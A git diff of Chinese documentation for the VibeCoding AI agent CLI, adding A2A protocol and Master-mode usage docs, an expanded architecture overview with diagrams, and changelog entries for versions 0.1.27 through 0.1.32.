+| `/a2a/task?task_id=xxx` | GET | 获取任务状态 |
+| `/a2a/task/cancel` | POST | 取消任务 |
+| `/a2a/events?task_id=xxx` | GET | SSE 事件流 |
+
+## Task 状态
+
+```
+submitted ─► working ─► completed
+                    ─► failed
+                    ─► canceled
+```
+
+## 示例
+
+### 提交任务（curl）
+
+```bash
+# 同步响应
+curl -X POST http://localhost:8093/a2a \
+  -H "Content-Type: application/json" \
+  -d '{
+    "jsonrpc": "2.0",
+    "method": "message/send",
+    "params": {
+      "message": {
+        "role": "user",
+        "parts": [{"type": "text", "text": "列出项目中的所有 Go 文件"}]
+      }
+    },
+    "id": 1
+  }'
+
+# SSE 流式
+curl -X POST http://localhost:8093/a2a \
+  -H "Content-Type: application/json" \
+  -H "Accept: text/event-stream" \
+  -d '{
+    "jsonrpc": "2.0",
+    "method": "message/send",
+    "params": {
+      "message": {
+        "role": "user",
+        "parts": [{"type": "text", "text": "解释项目结构"}]
+      }
+    },
+    "id": 1
+  }'
+```
+
+### REST API
+
+```bash
+# 提交任务
+curl -X POST http://localhost:8093/a2a/send \
+  -H "Content-Type: application/json" \
+  -d '{"message": {"role": "user", "parts": [{"type": "text", "text": "你好"}]}}'
+
+# 获取任务
+curl http://localhost:8093/a2a/task?task_id=task_123
+
+# 取消任务
+curl -X POST http://localhost:8093/a2a/task/cancel \
+  -H "Content-Type: application/json" \
+  -d '{"task_id": "task_123"}'
+```
+
+## 安全
+
+- **Auth Token**：Bearer token 认证（与 hermes 相同）
+- **Agent Card**：公开访问（无需认证）
+- **受保护端点**：配置 `auth_token` 后，`/a2a`、REST A2A 路由和 `/a2a/events` 都需要认证
+
+配置认证后，客户端需要发送：
+
+```bash
+Authorization: Bearer <auth_token>
+```
+
+## A2A Client
+
+向其他 A2A 服务器发送任务。
+
+```bash
+# 发送任务
+vibecoding a2a send "解释项目结构" --target http://remote:8093
+
+# 带认证发送
+vibecoding a2a send "运行测试" --target http://remote:8093 --auth-token xxx
+
+# 发现服务器能力
+vibecoding a2a discover http://remote:8093
+```
+
+## A2A 调度
+
+定时任务可以向 A2A 服务器发送任务，而不是运行本地 Agent。
+
+```bash
+# 调度每日任务到远程 A2A 服务器
+vibecoding hermes cron add "daily-review" "review recent changes" \
+  --schedule "@daily" \
+  --a2a-target http://review-agent:8093
+
+# 带认证的调度
+vibecoding hermes cron add "ci-check" "run CI tests" \
+  --schedule "@every 1h" \
+  --a2a-target http://ci-agent:8093 \
+  --a2a-token ${CI_TOKEN}
+```
+
+调度器会将 prompt 发送到 A2A 服务器，而不是启动本地 Agent。
+
+## A2A Master 模式
+
+A2A Master 模式让你可以在一个 VibeCoding 实例中管理多个远程 A2A Agent，通过 `a2a_dispatch` tool 向它们分发任务。
+
+### 快速开始
+
+```bash
+# 1. 生成示例配置
+vibecoding --init-a2a-master-config
+
+# 2. 编辑 a2a-list.json，填入实际的远程 agent 信息
+#    位置：~/.vibecoding/a2a-list.json 或 .vibe/a2a-list.json
+
+# 3. 启用 master 模式
+vibecoding --enable-a2a-master
+```
+
+### 配置文件
+
+`a2a-list.json` 结构如下：
+
+```json
+{
+  "agents": [
+    {
+      "name": "code-reviewer",
+      "url": "http://localhost:8093"
+    },
+    {
+      "name": "ci-agent",
+      "url": "http://ci-server:8093",
+      "auth_token": "your-secret-token"
+    }
+  ]
+}
+```
+
+| 字段 | 类型 | 说明 |
+|------|------|------|
+| `name` | string | Agent 名称（唯一标识，用于 tool 调用） |
+| `url` | string | A2A 服务器地址 |
+| `auth_token` | string | Bearer Token（可选） |
+
+配置文件位置（优先级从低到高）：
+- `~/.vibecoding/a2a-list.json`（全局）
+- `.vibe/a2a-list.json`（项目级，覆盖全局）
+
+### a2a_dispatch Tool
+
+启用后，LLM 会多出一个 `a2a_dispatch` tool，可以向注册的远程 agent 发送任务：
+
+**参数：**
+| 参数 | 类型 | 说明 |
+|------|------|------|
+| `agent_name` | string | 目标 agent 名称（从配置中自动枚举） |
+| `message` | string | 任务消息 |
+
+**示例：**
+```
+a2a_dispatch(agent_name="code-reviewer", message="review main.go for bugs")
+a2a_dispatch(agent_name="ci-agent", message="run all unit tests")
+```
+
+### CLI 参数
+
+| 参数 | 说明 |
+|------|------|
+| `--enable-a2a-master` | 启用 A2A Master 模式（默认关闭） |
+| `--init-a2a-master-config` | 生成示例 `a2a-list.json` |
+| `--force` | 覆盖已存在的配置文件 |
diff --git a/docs/zh/architecture.md b/docs/zh/architecture.md
index 4c6ec41..75ff464 100644
--- a/docs/zh/architecture.md
+++ b/docs/zh/architecture.md
@@ -8,6 +8,16 @@ vibecoding/
 ├── cmd/vibecoding/              # CLI 入口点
 │   └── main.go                  # 主程序
 ├── internal/
+│   ├── a2a/                     # A2A 协议服务器与 Master 模式
+│   │   ├── config.go            # A2A 配置与初始化
+│   │   ├── handler.go           # JSON-RPC 2.0 handler + SSE
+│   │   ├── client.go            # A2A 客户端
+│   │   ├── server.go            # HTTP 服务器
+│   │   ├── executor.go          # Task → Agent loop 执行器
+│   │   ├── agent_card.go        # Agent Card 生成
+│   │   ├── task.go              # Task 生命周期管理
+│   │   └── master.go            # A2A Master 模式（远程 agent 调度）
+│   ├── acp/                     # ACP / MCP 集成
 │   ├── agent/                   # 核心 Agent 循环
 │   │   ├── agent.go             # Agent 主逻辑
 │   │   ├── factory.go           # AgentFactory，统一每个 Agent 的创建
@@ -20,13 +30,18 @@ vibecoding/
 │   ├── config/                  # 配置管理
 │   ├── context/                 # 上下文管理和 token 估算
 │   ├── contextfiles/            # 上下文文件加载
+│   ├── cron/                    # 定时任务存储和调度器
+│   ├── gateway/                 # OpenAI 兼容 HTTP 网关
+│   ├── hermes/                  # 消息平台网关 (微信/飞书/WebSocket)
+│   ├── mcp/                     # MCP 服务器集成
+│   ├── memory/                  # 持久化记忆 (memory.md)
+│   ├── messaging/               # 消息平台抽象
 │   ├── platform/                # 跨平台兼容工具
 │   ├── provider/                # LLM Provider 抽象
 │   │   ├── anthropic/           # Anthropic Messages API
 │   │   ├── factory/             # 共享 provider/model 创建逻辑
 │   │   ├── vendor*.go           # 厂商适配注册和默认值
 │   │   └── openai/              # OpenAI Chat Completions API
-│   ├── cron/                    # 定时任务存储和调度器
 │   ├── sandbox/                 # 沙箱抽象 (bwrap, none)
 │   ├── session/                 # 会话管理 (JSONL)
 │   ├── skills/                  # 技能系统
@@ -37,16 +52,45 @@ vibecoding/
 │   │   ├── edit.go              # 文件编辑
 │   │   ├── grep.go              # 内容搜索
 │   │   ├── find.go              # 文件查找
-│   │   └── ls.go                # 目录列表
+│   │   ├── ls.go                # 目录列表
+│   │   ├── plan.go              # 任务规划
+│   │   ├── skill_ref.go         # 技能引用加载
+│   │   └── a2a_dispatch.go      # A2A 远程 agent 调度
 │   ├── tui/                     # 终端 UI (BubbleTea)
-│   └── ua/                      # User-Agent 字符串生成
+│   ├── ua/                      # User-Agent 字符串生成
+│   └── vendored/                # 内嵌二进制 (rg, fd)
+└── pkg/sdk/                     # 公共 SDK 接口
+```
+
+## 运行模式
+
+VibeCoding 支持 7 种运行模式，共享同一套 Agent、Provider、Tools、Session 基础设施：
+
+```
+┌─────────────────────────────────────────────────────────────────────────┐
+│                        VibeCoding 运行模式                               │
+├─────────────────────────────────────────────────────────────────────────┤
+│                                                                         │
+│  ┌──────────────┐  ┌──────────────┐  ┌──────────────┐                  │
+│  │  TUI (默认)   │  │  Print 模式   │  │  ACP stdio   │                  │
+│  │  vibecoding   │  │  vibecoding   │  │  vibecoding   │                  │
+│  │              │  │  -p "..."     │  │  acp          │                  │
+│  └──────────────┘  └──────────────┘  └──────────────┘                  │
+│                                                                         │
+│  ┌──────────────┐  ┌──────────────┐  ┌──────────────┐  ┌────────────┐ │
+│  │ Gateway 模式  │  │  Hermes 模式  │  │  A2A 独立模式 │  │ A2A Master │ │
+│  │  vibecoding   │  │  vibecoding   │  │ vibecoding    │  │ --enable-  │ │
+│  │  gateway      │  │  hermes       │  │ a2a start     │  │ a2a-master │ │
+│  └──────────────┘  └──────────────┘  └──────────────┘  └────────────┘ │
+│                                                                         │
+└─────────────────────────────────────────────────────────────────────────┘
 ```
 
 ## 核心组件
 
 ### 1. Provider 系统
 
-Provider 是与 LLM API 交互的抽象层。CLI 与 ACP 的 provider 创建都经过
+Provider 是与 LLM API 交互的抽象层。所有运行模式的 provider 创建都经过
 `internal/provider/factory`，先应用厂商适配默认值，再构造通用 OpenAI
 兼容或 Anthropic 兼容协议 provider。
 
@@ -90,7 +134,8 @@ type StreamEvent struct {
 
 ### 2. Agent 循环
 
-Agent 是核心逻辑，协调 Provider、Tools 和 Session。
+Agent 是核心逻辑，协调 Provider、Tools 和 Session。所有运行模式复用同一个
+Agent 循环，区别在于输入来源（终端、HTTP、消息平台、stdio）和输出目标。
 
 ```
 ┌─────────────────────────────────────────────────────────────┐
@@ -108,7 +153,7 @@ Agent 是核心逻辑，协调 Provider、Tools 和 Session。
 #### 执行流程
 
 ```
-User Input
+User Input (TUI / HTTP / Messaging / A2A / ACP stdio)
     │
     ▼
 ┌───────────────┐
@@ -154,15 +199,169 @@ Main Agent
 
 子 Agent 的 registry 会过滤 `subagent_*` 工具，因此不能继续创建嵌套子 Agent。
 
-### 4. Cron 调度器
+### 4. A2A 协议
+
+A2A（Agent-to-Agent）协议使不同的 AI Agent 能够互相发现、通信和协作。
+
+```
+┌───────────────────────────────────────────────────────────────────┐
+│                     A2A 协议架构                                    │
+├───────────────────────────────────────────────────────────────────┤
+│                                                                   │
+│  ┌──────────────────┐          ┌──────────────────┐              │
+│  │   A2A Server     │          │   A2A Client     │              │
+│  │  (vibecoding)    │ ◄──────► │  (任意 Agent)     │              │
+│  │                  │  JSON-RPC │                  │              │
+│  │  /a2a            │  2.0     │  SendMessage()   │              │
+│  │  /a2a/send       │  + SSE   │  GetTask()       │              │
+│  │  /a2a/task       │          │  CancelTask()    │              │
+│  │  /a2a/events     │          │  GetAgentCard()  │              │
+│  └──────────────────┘          └──────────────────┘              │
+│                                                                   │
+│  Task 生命周期: submitted → working → completed/failed/canceled    │
+│                                                                   │
+│  两种运行方式:                                                     │
+│  • 独立模式: vibecoding a2a start (端口 8093)                      │
+│  • 集成模式: hermes.json a2a.enabled: true (共享端口 8090)         │
+│                                                                   │
+└───────────────────────────────────────────────────────────────────┘
+```
+
+#### A2A Master 模式
+
+A2A Master 模式通过 `--enable-a2a-master` 启用，加载 `a2a-list.json`
+配置的远程 agent 列表，注册 `a2a_dispatch` tool 让 LLM 自动分发任务。
+
+```
+┌───────────────────────────────────────────────────────────────┐
+│                   A2A Master 模式                               │
+├───────────────────────────────────────────────────────────────┤
+│                                                               │
+│  a2a-list.json                                                │
+│  ┌─────────────────────────────────────────┐                  │
+│  │ agents:                                 │                  │
+│  │   - name: code-reviewer                 │                  │
+│  │     url: http://review:8093             │                  │
+│  │   - name: ci-agent                      │                  │
+│  │     url: http://ci:8093                 │                  │
+│  └─────────────────────────────────────────┘                  │
+│           │                                                   │
+│           ▼                                                   │
+│  ┌──────────────────┐                                         │
+│  │   A2AManager     │ ← 加载 agent 列表                        │
+│  └────────┬─────────┘                                         │
+│           │                                                   │
+│           ▼                                                   │
+│  ┌──────────────────┐                                         │
+│  │  a2a_dispatch    │ ← 注册为 LLM tool                       │
+│  │  (agent_name,    │                                         │
+│  │   message)       │                                         │
+│  └────────┬─────────┘                                         │
+│           │                                                   │
+│           ▼                                                   │
+│  ┌──────────────────┐  ┌──────────────────┐                  │
+│  │  code-reviewer   │  │  ci-agent        │                  │
+│  │  http://review   │  │  http://ci       │                  │
+│  │  :8093           │  │  :8093           │                  │
+│  └──────────────────┘  └──────────────────┘                  │
+│                                                               │
+└───────────────────────────────────────────────────────────────┘
+```
+
+### 5. Gateway 模式
+
+`internal/gateway/` 实现 OpenAI 兼容的 HTTP 网关，暴露标准 Chat Completions API。
+
+```
+┌─────────────────────────────────────────────────────────────┐
+│                    Gateway 架构                               │
+├─────────────────────────────────────────────────────────────┤
+│                                                             │
+│  OpenAI 兼容客户端 (curl, SDK, 任意工具)                      │
+│       │                                                     │
+│       ▼                                                     │
+│  ┌──────────────────────────────────────────┐               │
+│  │  HTTP Gateway (net/http)                 │               │
+│  │  POST /v1/chat/completions               │               │
+│  └──────────────────────────────────────────┘               │
+│       │                                                     │
+│       ▼                                                     │
+│  ┌──────────────────────────────────────────┐               │
+│  │  Agent Loop (复用同一套)                   │               │
+│  │  + Tools + Session + Sandbox + Skills     │               │
+│  └──────────────────────────────────────────┘               │
+│                                                             │
+│  配置: gateway.json (全局 ~/.vibecoding/ 或项目 .vibe/)       │
+│  安全: Bearer token + allowedWorkDirs + sandbox              │
+│                                                             │
+└─────────────────────────────────────────────────────────────┘
+```
+
+### 6. Hermes 消息平台网关
+
+`internal/hermes/` 实现消息平台网关，支持微信、飞书和 WebSocket。
+
+```
+┌─────────────────────────────────────────────────────────────┐
+│                    Hermes 架构                                │
+├─────────────────────────────────────────────────────────────┤
+│                                                             │
+│  ┌──────────┐  ┌──────────┐  ┌──────────┐                  │
+│  │  微信     │  │  飞书     │  │ WebSocket │                  │
+│  └─────┬────┘  └─────┬────┘  └─────┬────┘                  │
+│        │             │             │                         │
+│        └─────────────┼─────────────┘                         │
+│                      ▼                                       │
+│  ┌──────────────────────────────────────────┐               │
+│  │  Hermes Dispatcher                       │               │
+│  │  (per-user session, yolo mode default)   │               │
+│  └──────────────────────────────────────────┘               │
+│       │                                                     │
+│       ▼                                                     │
+│  ┌──────────────────────────────────────────┐               │
+│  │  Agent Loop (复用同一套)                   │               │
+│  │  + Tools + Session + Sandbox + Skills     │               │
+│  └──────────────────────────────────────────┘               │
+│                                                             │
+│  配置: hermes.json                                           │
+│  Session: <sessionDir>/hermes/<platform>/<user_id>/          │
+│                                                             │
+└─────────────────────────────────────────────────────────────┘
+```
+
+### 7. Cron 调度器
 
 `internal/cron` 包提供文件持久化的 cron store 和 scheduler，可通过子 Agent
-执行任务。TUI 在多 Agent 模式下暴露 `/cron` 命令入口；自然语言解析和持久化
-TUI 管理仍属于后续接线工作。
+或远程 A2A Server 执行任务。TUI 在多 Agent 模式下暴露 `/cron` 命令入口。
 
-### 5. 工具系统
+```
+┌─────────────────────────────────────────────────────────────┐
+│                    Cron 调度器                                │
+├─────────────────────────────────────────────────────────────┤
+│                                                             │
+│  ┌──────────────────┐                                       │
+│  │  CronStore       │ ← cron.json 持久化                     │
+│  │  (FileCronStore) │                                       │
+│  └────────┬─────────┘                                       │
+│           │                                                 │
+│           ▼                                                 │
+│  ┌──────────────────┐                                       │
+│  │  Scheduler       │ ← 定时轮询 (默认 30s)                  │
+│  └────────┬─────────┘                                       │
+│           │                                                 │
+│     ┌─────┴─────┐                                           │
+│     ▼           ▼                                           │
+│  ┌───────┐  ┌───────────┐                                   │
+│  │ 子Agent│  │ A2A Server│                                   │
+│  │ (本地) │  │ (远程)    │  ← --a2a-target 参数               │
+│  └───────┘  └───────────┘                                   │
+│                                                             │
+└─────────────────────────────────────────────────────────────┘
+```
+
+### 8. 工具系统
 
-工具是 Agent 与外部世界交互的方式。
+工具是 Agent 与外部世界交互的方式。所有运行模式共享同一套工具注册表。
 
 ```
 ┌─────────────────────────────────────────────────────────────┐
@@ -181,11 +380,17 @@ TUI 管理仍属于后续接线工作。
 │  File Tools   │   │  Search Tools │   │  System Tools │
 │  - read       │   │  - grep       │   │  - bash       │
 │  - write      │   │  - find       │   │  - ls         │
-│  - edit       │   │               │   │               │
+│  - edit       │   │               │   │  - jobs       │
+└───────────────┘   └───────────────┘   │  - kill       │
+                                        └───────────────┘
+┌───────────────┐   ┌───────────────┐   ┌───────────────┐
+│  Planning     │   │  Skills       │   │  A2A Master   │
+│  - plan       │   │  - skill_ref  │   │  - a2a_       │
+│               │   │               │   │    dispatch   │
 └───────────────┘   └───────────────┘   └───────────────┘
 ```
 
-### 6. 会话管理
+### 9. 会话管理
 
 会话使用 JSONL 格式存储，支持树状结构和分支。
 
@@ -228,7 +433,7 @@ TUI 管理仍属于后续接线工作。
 | `compaction` | 上下文压缩记录 |
 | `label` | 会话标签 |
 
-### 7. 沙箱系统
+### 10. 沙箱系统
 
 沙箱通过 bubblewrap (bwrap) 实现进程隔离。
 
@@ -250,7 +455,7 @@ TUI 管理仍属于后续接线工作。
 └───────────────┘   └───────────────┘   └───────────────┘
 ```
 
-### 8. TUI 系统
+### 11. TUI 系统
 
 基于 BubbleTea 的终端用户界面。
 
@@ -279,15 +484,28 @@ TUI 管理仍属于后续接线工作。
 └─────────────────────────────────────────────────────────────┘
 ```
 
+## 配置文件总览
+
+| 文件 | 位置 | 用途 |
+|------|------|------|
+| `settings.json` | `~/.vibecoding/` 或 `.vibe/` | 核心设置（provider、model、mode 等） |
+| `gateway.json` | `~/.vibecoding/` 或 `.vibe/` | HTTP 网关配置 |
+| `hermes.json` | `~/.vibecoding/` 或 `.vibe/` | 消息平台网关配置 |
+| `a2a.json` | `~/.vibecoding/` 或 `.vibe/` | A2A 服务器配置 |
+| `a2a-list.json` | `~/.vibecoding/` 或 `.vibe/` | A2A Master 远程 agent 列表 |
+| `mcp.json` | `~/.vibecoding/` 或 `.vibe/` | MCP 服务器配置 |
+| `memory.md` | 项目根目录或 `~/.vibecoding/` | 持久化记忆 |
+| `cron.json` | `~/.vibecoding/` | 定时任务持久化 |
+
 ## 数据流
 
 ### 完整请求流程
 
 ```
-1. 用户输入
+1. 用户输入 (来自 TUI / HTTP / Messaging / A2A / ACP stdio)
    │
    ▼
-2. TUI 捕获输入
+2. 输入层捕获
    │
    ▼
 3. Agent.Run(ctx, input)
@@ -311,7 +529,7 @@ TUI 管理仍属于后续接线工作。
 7. SSE 流式响应
    ├── TextDelta → 显示文本
    ├── ThinkingDelta → 显示思考
-   └── ToolCall → 执行工具
+   └── ToolCall → 执行工具 (含 a2a_dispatch)
    │
    ▼
 8. 工具执行 (通过 Sandbox)
@@ -353,3 +571,8 @@ TUI 管理仍属于后续接线工作。
 `agent/` 包暴露公共 Go 类型（`Agent`、`Provider`、`Builder`），外部应用可以
 在不依赖 internal 包的情况下嵌入 Agent。
 详见 [SDK 集成指南](sdk.md)。
+
+### 7. 复用 Agent 循环
+
+所有运行模式（TUI、Gateway、Hermes、A2A、ACP）复用同一个 Agent 循环，
+区别仅在于输入来源和输出目标。这保证了行为一致性，避免了逻辑分叉。
diff --git a/docs/zh/changelog.md b/docs/zh/changelog.md
index 2cf833d..e233728 100644
--- a/docs/zh/changelog.md
+++ b/docs/zh/changelog.md
@@ -1,6 +1,394 @@
 # 更新日志
 
 
+## v0.1.32
+
+### ✨ 新功能
+
+- **工具系统完整性**
+  - 补充所有已注册工具的完整文档：`jobs`、`kill`、`question`、`memory`、`cron` 及 MCP 动态工具
+  - `jobs` 工具：列出并查看通过 `bash async=true` 启动的后台任务，支持清理已完成任务
+  - `kill` 工具：通过 Job ID 终止正在运行的后台任务
+  - `question` 工具：Plan 模式下 AI 可向用户提出多选问题以澄清需求
+  - `memory` 工具（Hermes）：通过 `memory.md` 实现跨会话持久记忆，支持 read/add/update/delete 操作
+  - `cron` 工具（Hermes/多 Agent）：通过子 Agent 执行定时后台任务，支持 `@daily`、`@weekly`、`@every N` 调度及单次执行
+  - MCP 动态工具：来自 MCP 服务器的 tools/resources/prompts 在会话中自动发现和注册
+
+- **Plan 模式提问工具**
+  - 新增 `question` 工具，仅在 TUI + plan 模式下注册
+  - AI 可向用户提出多选问题，用户选择预设选项或输入自定义答案
+  - 用于在制定方案前澄清需求，形成更优质的计划
+  - 通过 `QuestionHandler` 可选接口暴露（类型断言），不污染公共 `Agent` 接口
+
+### 🐛 Bug 修复
+
+- **Bash 工具输出安全**
+  - 同步 bash 模式新增 1GB 输出限制，使用 `limitedBuffer` 防止无界 `bytes.Buffer` 导致 OOM
+
+- **Hermes `/compact` 命令**
+  - 实现 Hermes 消息模式下的 `/compact` 斜杠命令（之前是 TODO 桩）
+  - 在 session 上设置 `ForceCompact` 标志，下次 agent 运行时消费以触发上下文压缩
+
+- **Session 持久性**
+  - `writeEntry` 写入后调用 `f.Sync()`，保证崩溃或断电后数据不丢失
+  - 损坏的 session 行现在记录为 warning 并跳过，不再阻止 session 加载
+
+- **Hermes 审批竞态修复**
+  - `ResolveApproval` 使用 `select` 发送，避免超时与审批竞态时写入已消费的 channel
+
+- **子代理 Panic 日志**
+  - `sendParentEvent` 在 recover 前记录 panic 值，便于诊断关闭 channel 的竞态
+
+- **原子文件写入清理**
+  - `writeFileAtomic` 移除 `defer os.Remove(tmpPath)`，改为各错误路径显式清理，避免成功后尝试删除已重命名的文件
+
+- **Agent 循环检测可配置化**
+  - `MaxConsecutiveNoText`（卡住检测阈值）可通过 `AgentLoopConfig` 配置（默认 95）
+  - 修复错误消息中错误地将前后警告计数器相加的问题
+
+- **Job Manager 自动清理**
+  - `AddJob` 时自动 GC 30 分钟前完成的 job（每 5 分钟检查一次）
+
+- **Cron 调度器错误日志**
+  - `checkAndRun` 现在记录 store 错误，不再静默吞掉
+
+- **TUI Bash 输出显示**
+  - 压缩 bash 工具输出摘要，去除空行，避免 TUI 折叠视图中占用过高垂直空间
+
+- **内嵌搜索工具**
+  - 当当前架构没有内嵌 `rg` / `fd` 时，退回使用系统 `grep` / `find`
+
+### 📦 分发
+
+- 新增 Linux LoongArch64 (`loong64`) 构建与打包目标，包括 tarball、Debian 和 npm 包元数据
+
+### ✅ 测试
+
+- 新增 `limitedBuffer` 截断、`JobManager` GC、`writeFileAtomic` 清理、`sendParentEvent` panic 恢复、`MaxConsecutiveNoText` 可配置性、session fsync 持久性、损坏行容忍、`QuestionTool` 元数据/模式过滤/执行/错误处理的单元测试
+
+
+## v0.1.31
+
+### 🐛 Bug 修复
+
+- **终端输入**
+  - 输入框支持 Home/End 光标移动
+  - 修复在权限审批提示中按 Esc 取消后，第一次回车提交的输入被吞掉的问题
+  - 输入框支持 Up/Down 历史记录导航，并可反复上下选择历史输入
+
+- **A2A 安全与可靠性**
+  - A2A 默认监听地址从 `0.0.0.0` 改为 `127.0.0.1`
+  - 为 `/a2a`、REST A2A 路由和 SSE 事件添加 Bearer token 认证，同时保持 Agent Card 公开
+  - 将基于时间戳的 A2A task ID 替换为抗碰撞的随机 ID
+  - A2A task store 读写改为使用 task 快照，避免外部意外修改共享状态
+
+- **路径与 Session 安全**
+  - 路径包含校验改为使用路径边界，而不是字符串前缀匹配
+  - 禁止 context `extraFiles` 逃逸工作目录
+  - 对 Hermes session 路径组件进行安全编码，并在创建 session 时强制校验 `allowed_work_dirs`
+  - 限制 session 删除只能删除配置 session 目录下的 `.jsonl` 文件
+
+- **认证、审批与资源限制**
+  - Hermes HTTP/WebSocket token 校验改为常量时间比较
+  - Hermes WebSocket 客户端改为通过 `Authorization: Bearer ...` 发送认证信息，不再放入 query string
+  - ACP 权限请求超时后清理 pending 状态，并向调用方传播写入错误
+  - 为 ACP、read 工具图片文件、微信响应和 cron A2A 响应增加大小限制
+  - 为 cron A2A HTTP 请求增加超时
+
+- **Memory、Context 与并发**
+  - 为 memory store 操作增加锁
+  - 修复 `memory.WriteAll()` 路径处理，并将 memory update/delete 限制在指定 section 内
+  - Gateway 在请求级 `temperature`/`top_p` 覆盖前克隆模型配置
+  - Agent callback 使用 context/message 快照，避免共享引用
+  - Cron job 状态变更通过 job store 串行化
+
+- **配置与 Gateway 加固**
+  - `!command` API key 解析现在必须显式设置 `VIBECODING_ALLOW_SHELL_CONFIG=1`
+  - 修复 Gateway CORS，使其只回显被允许的请求 origin
+  - Gateway 在非 loopback 监听、`yolo` 模式且未开启认证时输出启动警告
+  - 加固 platform home/shell fallback 行为
+
+### 🧪 测试
+
+- 增加 A2A 认证、task ID 唯一性、task 快照隔离和 working task message 持久化回归测试
+- 增加路径逃逸、危险 session ID、memory section 操作、ACP 清理、CORS、UTF-8 截断和 shell-config opt-in 测试
+- 已运行聚焦包测试，以及 A2A、agent、gateway、cron 的 race 测试
+
+### 📝 文档
+
+- 更新 A2A、Hermes、Gateway、配置和安全文档，说明新的认证和加固行为
+
+## v0.1.30
+
+### ✨ 新功能
+
+- **Provider 级 HTTP 代理**
+  - 新增 `providers.<name>.httpProxy`，支持为不同 provider 配置不同 HTTP 代理
+  - 未配置 `httpProxy` 时继续保留默认环境变量代理行为
+
+- **Google Gemini 和 Vertex 厂商适配器**
+  - 新增原生 `google-gemini` 和 `google-vertex` provider，使用 Google `streamGenerateContent`
+  - 支持 Gemini API 和 Vertex AI 原生 Gemini 端点的 baseUrl 自动识别
+  - 新增 Gemini API key 和 Vertex bearer token 的默认 Google provider 模板
+  - 更新 provider 文档与识别测试覆盖
+
+- **Hosted Web Search 工具**
+  - 为 CLI 和 ACP 运行新增 `--web-search`
+  - 新增顶层 `webSearch` 配置，包含 `enabled`、`provider`、`providerType` 和 `model`
+  - 仅在启用时注册 hosted `web_search`，并与本地 function tools 保持隔离
+  - 新增 OpenAI Responses API 映射到 `web_search`
+  - 将 Responses web search 映射改为 provider-neutral 的 `web_search`，兼容 provider 不必命名为 `openai`
+  - 新增 Anthropic Messages API 映射到 `web_search_20250305`
+  - 将 `webSearch.model` 保留为 provider-neutral metadata，用于后续路由和成本展示扩展
+
+- **默认 Provider 模板**
+  - 新增 OpenAI、Anthropic 和 Xiaomi MiMo 默认 provider 配置
+  - 保留 DeepSeek providers，并继续使用 `deepseek-openai` 作为默认 provider/model
+  - 首次生成的 `settings.json` 现在包含默认关闭的 web search 配置，以及 OpenAI/Anthropic/Xiaomi provider 模板
+
+### 🧪 测试
+
+- 增加 OpenAI Responses 和 Anthropic Messages hosted web search 序列化测试
+- 增加 web search 配置默认值、CLI flag 解析和 hosted tool metadata 传递测试
+- 增加 macOS 默认配置目录解析测试
+
+### 🐛 Bug 修复
+
+- **macOS 配置目录**
+  - 将 macOS 默认全局配置目录与 Linux 统一为 `~/.vibecoding`
+
+- **发布版本号**
+  - npm 和发行包版本检测默认不再附加 `dirty` 后缀
+  - 将 npm package metadata 规范化为 `0.1.30`
+
+## v0.1.29
+
+### 🐛 Bug 修复
+
+- **NPM 包装修复**
+  - 修复 `npm/bin/vibecoding` 入口脚本，确保安装包正确附带可执行包装器
+  - 调整 `build-npm.sh` 和 `build-npm-packages.sh` 保证包装器一致性
+
+## v0.1.28
+
+### ✨ 新功能
+
+- **Per-Model 温度/Top-P 配置**
+  - 为 `ModelConfig` 和 `Model` 新增 `temperature` 和 `top_p` 字段，支持逐模型参数调优
+  - 在 OpenAI 和 Anthropic 提供商中打通，使用 `omitempty` — `nil` 表示使用 API 默认值
+  - 在 provider factory、agent loop、ACP 模式中打通
+  - Gateway 模式支持请求级 `temperature`/`top_p` 覆盖（通过 `ChatParams`）
+  - 未配置时完全省略参数（不会向 API 发送零值）
+
+- **OpenAI Responses API 支持**
+  - 新增独立的 OpenAI Responses provider 路径，通过 `api: "openai-responses"` 启用
+  - 支持 Responses 流式输出、工具调用、reasoning summary 和 prompt cache 参数
+  - 在 provider `responses` 配置中暴露 Responses 专用设置，默认启用 prompt cache
+  - 新增模型兼容标志 `supportsPromptCacheKey` 和 `supportsReasoningSummary`
+
+### 🧪 测试
+
+- 提升 OpenAI Responses API 和 Anthropic 请求解析相关测试覆盖
+- 将 Anthropic 测试改为内存 HTTP mock，避免依赖本地端口监听
+
+### 📝 文档
+
+- 更新 `AGENTS.md` 版本至 v0.1.28
+
+## v0.1.27
+
+### ✨ 新功能
+
+- **Hermes 模式** (`vibecoding hermes`)
+  - 新增消息平台网关模式，支持微信、飞书和 WebSocket
+  - 持久化 per-user session，`/new` 时自动归档
+  - 默认 `yolo` 模式，适合无人值守场景
+  - 智能审批分级策略（low/medium/high 风险等级）
+  - 用户白名单访问控制
+  - WebSocket 流式推送：text_delta/think_delta/tool_call/tool_result/tool_diff/usage/done
+
+- **A2A 协议** (`vibecoding a2a`)
+  - 新增 Agent-to-Agent 协议服务器（JSON-RPC 2.0 over HTTP + SSE 流式）
+  - 独立模式：`vibecoding a2a start`（端口 8093）
+  - 集成模式：`hermes.json` 中 `a2a.enabled: true`，共享 hermes HTTP 端口
+  - Agent Card：`/.well-known/agent.json`
+  - Task 生命周期：submitted → working → completed/failed/canceled
+  - REST 端点：`/a2a/send`、`/a2a/task`、`/a2a/task/cancel`、`/a2a/events`
+  - **A2A Client**：`vibecoding a2a send <message>` 向其他 A2A Server 发送任务
+  - **A2A 发现**：`vibecoding a2a discover <url>` 获取远程 Agent Card
+  - **A2A 调度**：Cron 任务支持 `--a2a-target` 参数，定时向 A2A Server 发送任务
+
+- **A2A Master 模式** (`--enable-a2a-master`)
+  - 通过 `a2a-list.json` 配置多个远程 A2A Agent
+  - 注册 `a2a_dispatch` tool，LLM 可自动向远程 agent 分发任务
+  - 支持全局（`~/.vibecoding/a2a-list.json`）和项目级（`.vibe/a2a-list.json`）配置
+  - `--init-a2a-master-config` 生成示例配置文件
+  - 默认关闭，需显式启用
+
+- **A2A 配置初始化**
+  - `vibecoding a2a --init-a2a-config` 生成 `a2a.json` 配置模板
+  - `vibecoding --init-gateway` 生成 `gateway.json` 配置模板（已有）
+  - `vibecoding --init-a2a-master-config` 生成 `a2a-list.json` 配置模板
+  - 所有 `--init-*` 支持 `--force` 覆盖已存在的文件
+
+- **场景演示文档**
+  - 新增 `docs/scenarios.md`（中英文），覆盖 9 种实际使用场景
+  - 涵盖：日常编码、CI 集成、多 Agent、VS Code ACP、A2A 服务器、
+    A2A Master 跨机器调度、Gateway HTTP 网关、Hermes 消息平台、组合模式
+
+- **文档全面更新**
+  - `architecture.md`：补全全部模块（a2a/acp/gateway/hermes/mcp/memory/messaging/vendored）
+  - `tools.md`：新增 `a2a_dispatch` 和 `skill_ref` 工具文档
